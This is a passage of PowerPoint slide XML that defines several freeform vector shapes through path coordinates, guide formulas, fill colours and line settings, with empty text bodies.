                      <a:pt x="42" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36240" name="Freeform 373"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4147" y="2476"/>
                <a:ext cx="52" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 52"/>
                  <a:gd name="T1" fmla="*/ 20 h 29"/>
                  <a:gd name="T2" fmla="*/ 10 w 52"/>
                  <a:gd name="T3" fmla="*/ 8 h 29"/>
                  <a:gd name="T4" fmla="*/ 14 w 52"/>
                  <a:gd name="T5" fmla="*/ 3 h 29"/>
                  <a:gd name="T6" fmla="*/ 17 w 52"/>
                  <a:gd name="T7" fmla="*/ 1 h 29"/>
                  <a:gd name="T8" fmla="*/ 18 w 52"/>
                  <a:gd name="T9" fmla="*/ 0 h 29"/>
                  <a:gd name="T10" fmla="*/ 21 w 52"/>
                  <a:gd name="T11" fmla="*/ 0 h 29"/>
                  <a:gd name="T12" fmla="*/ 23 w 52"/>
                  <a:gd name="T13" fmla="*/ 3 h 29"/>
                  <a:gd name="T14" fmla="*/ 27 w 52"/>
                  <a:gd name="T15" fmla="*/ 4 h 29"/>
                  <a:gd name="T16" fmla="*/ 38 w 52"/>
                  <a:gd name="T17" fmla="*/ 5 h 29"/>
                  <a:gd name="T18" fmla="*/ 41 w 52"/>
                  <a:gd name="T19" fmla="*/ 5 h 29"/>
                  <a:gd name="T20" fmla="*/ 43 w 52"/>
                  <a:gd name="T21" fmla="*/ 7 h 29"/>
                  <a:gd name="T22" fmla="*/ 46 w 52"/>
                  <a:gd name="T23" fmla="*/ 12 h 29"/>
                  <a:gd name="T24" fmla="*/ 45 w 52"/>
                  <a:gd name="T25" fmla="*/ 13 h 29"/>
                  <a:gd name="T26" fmla="*/ 45 w 52"/>
                  <a:gd name="T27" fmla="*/ 15 h 29"/>
                  <a:gd name="T28" fmla="*/ 48 w 52"/>
                  <a:gd name="T29" fmla="*/ 17 h 29"/>
                  <a:gd name="T30" fmla="*/ 50 w 52"/>
                  <a:gd name="T31" fmla="*/ 18 h 29"/>
                  <a:gd name="T32" fmla="*/ 52 w 52"/>
                  <a:gd name="T33" fmla="*/ 20 h 29"/>
                  <a:gd name="T34" fmla="*/ 52 w 52"/>
                  <a:gd name="T35" fmla="*/ 22 h 29"/>
                  <a:gd name="T36" fmla="*/ 50 w 52"/>
                  <a:gd name="T37" fmla="*/ 27 h 29"/>
                  <a:gd name="T38" fmla="*/ 46 w 52"/>
                  <a:gd name="T39" fmla="*/ 27 h 29"/>
                  <a:gd name="T40" fmla="*/ 38 w 52"/>
                  <a:gd name="T41" fmla="*/ 28 h 29"/>
                  <a:gd name="T42" fmla="*/ 30 w 52"/>
                  <a:gd name="T43" fmla="*/ 27 h 29"/>
                  <a:gd name="T44" fmla="*/ 27 w 52"/>
                  <a:gd name="T45" fmla="*/ 26 h 29"/>
                  <a:gd name="T46" fmla="*/ 25 w 52"/>
                  <a:gd name="T47" fmla="*/ 26 h 29"/>
                  <a:gd name="T48" fmla="*/ 21 w 52"/>
                  <a:gd name="T49" fmla="*/ 28 h 29"/>
                  <a:gd name="T50" fmla="*/ 17 w 52"/>
                  <a:gd name="T51" fmla="*/ 29 h 29"/>
                  <a:gd name="T52" fmla="*/ 17 w 52"/>
                  <a:gd name="T53" fmla="*/ 29 h 29"/>
                  <a:gd name="T54" fmla="*/ 11 w 52"/>
                  <a:gd name="T55" fmla="*/ 27 h 29"/>
                  <a:gd name="T56" fmla="*/ 7 w 52"/>
                  <a:gd name="T57" fmla="*/ 26 h 29"/>
                  <a:gd name="T58" fmla="*/ 2 w 52"/>
                  <a:gd name="T59" fmla="*/ 25 h 29"/>
                  <a:gd name="T60" fmla="*/ 0 w 52"/>
                  <a:gd name="T61" fmla="*/ 21 h 29"/>
                  <a:gd name="T62" fmla="*/ 1 w 52"/>
                  <a:gd name="T63" fmla="*/ 20 h 29"/>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52"/>
                  <a:gd name="T97" fmla="*/ 0 h 29"/>
                  <a:gd name="T98" fmla="*/ 52 w 52"/>
                  <a:gd name="T99" fmla="*/ 29 h 29"/>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52" h="29">
                    <a:moveTo>
                      <a:pt x="1" y="20"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36241" name="Freeform 374"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4147" y="2476"/>
                <a:ext cx="52" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 52"/>
                  <a:gd name="T1" fmla="*/ 20 h 29"/>
                  <a:gd name="T2" fmla="*/ 10 w 52"/>
                  <a:gd name="T3" fmla="*/ 8 h 29"/>
                  <a:gd name="T4" fmla="*/ 14 w 52"/>
                  <a:gd name="T5" fmla="*/ 3 h 29"/>
                  <a:gd name="T6" fmla="*/ 17 w 52"/>
                  <a:gd name="T7" fmla="*/ 1 h 29"/>
                  <a:gd name="T8" fmla="*/ 18 w 52"/>
                  <a:gd name="T9" fmla="*/ 0 h 29"/>
                  <a:gd name="T10" fmla="*/ 21 w 52"/>
                  <a:gd name="T11" fmla="*/ 0 h 29"/>
                  <a:gd name="T12" fmla="*/ 23 w 52"/>
                  <a:gd name="T13" fmla="*/ 3 h 29"/>
                  <a:gd name="T14" fmla="*/ 27 w 52"/>
                  <a:gd name="T15" fmla="*/ 4 h 29"/>
                  <a:gd name="T16" fmla="*/ 38 w 52"/>
                  <a:gd name="T17" fmla="*/ 5 h 29"/>
                  <a:gd name="T18" fmla="*/ 41 w 52"/>
                  <a:gd name="T19" fmla="*/ 5 h 29"/>
                  <a:gd name="T20" fmla="*/ 43 w 52"/>
                  <a:gd name="T21" fmla="*/ 7 h 29"/>
                  <a:gd name="T22" fmla="*/ 46 w 52"/>
                  <a:gd name="T23" fmla="*/ 12 h 29"/>
                  <a:gd name="T24" fmla="*/ 45 w 52"/>
                  <a:gd name="T25" fmla="*/ 13 h 29"/>
                  <a:gd name="T26" fmla="*/ 45 w 52"/>
                  <a:gd name="T27" fmla="*/ 15 h 29"/>
                  <a:gd name="T28" fmla="*/ 48 w 52"/>
                  <a:gd name="T29" fmla="*/ 17 h 29"/>
                  <a:gd name="T30" fmla="*/ 50 w 52"/>
                  <a:gd name="T31" fmla="*/ 18 h 29"/>
                  <a:gd name="T32" fmla="*/ 52 w 52"/>
                  <a:gd name="T33" fmla="*/ 20 h 29"/>
                  <a:gd name="T34" fmla="*/ 52 w 52"/>
                  <a:gd name="T35" fmla="*/ 22 h 29"/>
                  <a:gd name="T36" fmla="*/ 50 w 52"/>
                  <a:gd name="T37" fmla="*/ 27 h 29"/>
                  <a:gd name="T38" fmla="*/ 46 w 52"/>
                  <a:gd name="T39" fmla="*/ 27 h 29"/>
                  <a:gd name="T40" fmla="*/ 38 w 52"/>
                  <a:gd name="T41" fmla="*/ 28 h 29"/>
                  <a:gd name="T42" fmla="*/ 30 w 52"/>
                  <a:gd name="T43" fmla="*/ 27 h 29"/>
                  <a:gd name="T44" fmla="*/ 27 w 52"/>
                  <a:gd name="T45" fmla="*/ 26 h 29"/>
                  <a:gd name="T46" fmla="*/ 25 w 52"/>
                  <a:gd name="T47" fmla="*/ 26 h 29"/>
                  <a:gd name="T48" fmla="*/ 21 w 52"/>
                  <a:gd name="T49" fmla="*/ 28 h 29"/>
                  <a:gd name="T50" fmla="*/ 17 w 52"/>
                  <a:gd name="T51" fmla="*/ 29 h 29"/>
                  <a:gd name="T52" fmla="*/ 17 w 52"/>
                  <a:gd name="T53" fmla="*/ 29 h 29"/>
                  <a:gd name="T54" fmla="*/ 11 w 52"/>
                  <a:gd name="T55" fmla="*/ 27 h 29"/>
                  <a:gd name="T56" fmla="*/ 7 w 52"/>
                  <a:gd name="T57" fmla="*/ 26 h 29"/>
                  <a:gd name="T58" fmla="*/ 2 w 52"/>
                  <a:gd name="T59" fmla="*/ 25 h 29"/>
                  <a:gd name="T60" fmla="*/ 0 w 52"/>
                  <a:gd name="T61" fmla="*/ 21 h 29"/>
                  <a:gd name="T62" fmla="*/ 1 w 52"/>
                  <a:gd name="T63" fmla="*/ 20 h 29"/>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52"/>
                  <a:gd name="T97" fmla="*/ 0 h 29"/>
                  <a:gd name="T98" fmla="*/ 52 w 52"/>
                  <a:gd name="T99" fmla="*/ 29 h 29"/>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52" h="29">
                    <a:moveTo>
                      <a:pt x="1" y="20"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36242" name="Freeform 375"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4136" y="2511"/>
                <a:ext cx="72" cy="92"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 72"/>
                  <a:gd name="T1" fmla="*/ 90 h 92"/>
                  <a:gd name="T2" fmla="*/ 60 w 72"/>
                  <a:gd name="T3" fmla="*/ 77 h 92"/>
                  <a:gd name="T4" fmla="*/ 53 w 72"/>
                  <a:gd name="T5" fmla="*/ 63 h 92"/>
                  <a:gd name="T6" fmla="*/ 45 w 72"/>
                  <a:gd name="T7" fmla="*/ 66 h 92"/>
                  <a:gd name="T8" fmla="*/ 43 w 72"/>
                  <a:gd name="T9" fmla="*/ 63 h 92"/>
                  <a:gd name="T10" fmla="*/ 40 w 72"/>
                  <a:gd name="T11" fmla="*/ 58 h 92"/>
                  <a:gd name="T12" fmla="*/ 39 w 72"/>
                  <a:gd name="T13" fmla="*/ 64 h 92"/>
                  <a:gd name="T14" fmla="*/ 41 w 72"/>
                  <a:gd name="T15" fmla="*/ 73 h 92"/>
                  <a:gd name="T16" fmla="*/ 37 w 72"/>
                  <a:gd name="T17" fmla="*/ 75 h 92"/>
                  <a:gd name="T18" fmla="*/ 34 w 72"/>
                  <a:gd name="T19" fmla="*/ 80 h 92"/>
                  <a:gd name="T20" fmla="*/ 30 w 72"/>
                  <a:gd name="T21" fmla="*/ 73 h 92"/>
                  <a:gd name="T22" fmla="*/ 28 w 72"/>
                  <a:gd name="T23" fmla="*/ 78 h 92"/>
                  <a:gd name="T24" fmla="*/ 24 w 72"/>
                  <a:gd name="T25" fmla="*/ 80 h 92"/>
                  <a:gd name="T26" fmla="*/ 19 w 72"/>
                  <a:gd name="T27" fmla="*/ 81 h 92"/>
                  <a:gd name="T28" fmla="*/ 15 w 72"/>
                  <a:gd name="T29" fmla="*/ 75 h 92"/>
                  <a:gd name="T30" fmla="*/ 10 w 72"/>
                  <a:gd name="T31" fmla="*/ 50 h 92"/>
                  <a:gd name="T32" fmla="*/ 7 w 72"/>
                  <a:gd name="T33" fmla="*/ 45 h 92"/>
                  <a:gd name="T34" fmla="*/ 11 w 72"/>
                  <a:gd name="T35" fmla="*/ 37 h 92"/>
                  <a:gd name="T36" fmla="*/ 2 w 72"/>
                  <a:gd name="T37" fmla="*/ 32 h 92"/>
                  <a:gd name="T38" fmla="*/ 4 w 72"/>
                  <a:gd name="T39" fmla="*/ 25 h 92"/>
                  <a:gd name="T40" fmla="*/ 10 w 72"/>
                  <a:gd name="T41" fmla="*/ 21 h 92"/>
                  <a:gd name="T42" fmla="*/ 13 w 72"/>
                  <a:gd name="T43" fmla="*/ 19 h 92"/>
                  <a:gd name="T44" fmla="*/ 4 w 72"/>
                  <a:gd name="T45" fmla="*/ 11 h 92"/>
                  <a:gd name="T46" fmla="*/ 0 w 72"/>
                  <a:gd name="T47" fmla="*/ 8 h 92"/>
                  <a:gd name="T48" fmla="*/ 4 w 72"/>
                  <a:gd name="T49" fmla="*/ 1 h 92"/>
                  <a:gd name="T50" fmla="*/ 15 w 72"/>
                  <a:gd name="T51" fmla="*/ 2 h 92"/>
                  <a:gd name="T52" fmla="*/ 20 w 72"/>
                  <a:gd name="T53" fmla="*/ 7 h 92"/>
                  <a:gd name="T54" fmla="*/ 27 w 72"/>
                  <a:gd name="T55" fmla="*/ 7 h 92"/>
                  <a:gd name="T56" fmla="*/ 28 w 72"/>
                  <a:gd name="T57" fmla="*/ 13 h 92"/>
                  <a:gd name="T58" fmla="*/ 29 w 72"/>
                  <a:gd name="T59" fmla="*/ 19 h 92"/>
                  <a:gd name="T60" fmla="*/ 37 w 72"/>
                  <a:gd name="T61" fmla="*/ 21 h 92"/>
                  <a:gd name="T62" fmla="*/ 47 w 72"/>
                  <a:gd name="T63" fmla="*/ 20 h 92"/>
                  <a:gd name="T64" fmla="*/ 66 w 72"/>
                  <a:gd name="T65" fmla="*/ 23 h 92"/>
                  <a:gd name="T66" fmla="*/ 66 w 72"/>
                  <a:gd name="T67" fmla="*/ 30 h 92"/>
                  <a:gd name="T68" fmla="*/ 58 w 72"/>
                  <a:gd name="T69" fmla="*/ 38 h 92"/>
                  <a:gd name="T70" fmla="*/ 50 w 72"/>
                  <a:gd name="T71" fmla="*/ 42 h 92"/>
                  <a:gd name="T72" fmla="*/ 49 w 72"/>
                  <a:gd name="T73" fmla="*/ 48 h 92"/>
                  <a:gd name="T74" fmla="*/ 51 w 72"/>
                  <a:gd name="T75" fmla="*/ 54 h 92"/>
                  <a:gd name="T76" fmla="*/ 56 w 72"/>
                  <a:gd name="T77" fmla="*/ 59 h 92"/>
                  <a:gd name="T78" fmla="*/ 61 w 72"/>
                  <a:gd name="T79" fmla="*/ 47 h 92"/>
                  <a:gd name="T80" fmla="*/ 66 w 72"/>
                  <a:gd name="T81" fmla="*/ 46 h 92"/>
                  <a:gd name="T82" fmla="*/ 71 w 72"/>
                  <a:gd name="T83" fmla="*/ 70 h 92"/>
                  <a:gd name="T84" fmla="*/ 72 w 72"/>
                  <a:gd name="T85" fmla="*/ 86 h 92"/>
                  <a:gd name="T86" fmla="*/ 65 w 72"/>
                  <a:gd name="T87" fmla="*/ 92 h 9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72"/>
                  <a:gd name="T133" fmla="*/ 0 h 92"/>
                  <a:gd name="T134" fmla="*/ 72 w 72"/>
                  <a:gd name="T135" fmla="*/ 92 h 92"/>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72" h="92">
                    <a:moveTo>
                      <a:pt x="65" y="92"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="64" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="92"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36243" name="Freeform 376"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4136" y="2511"/>
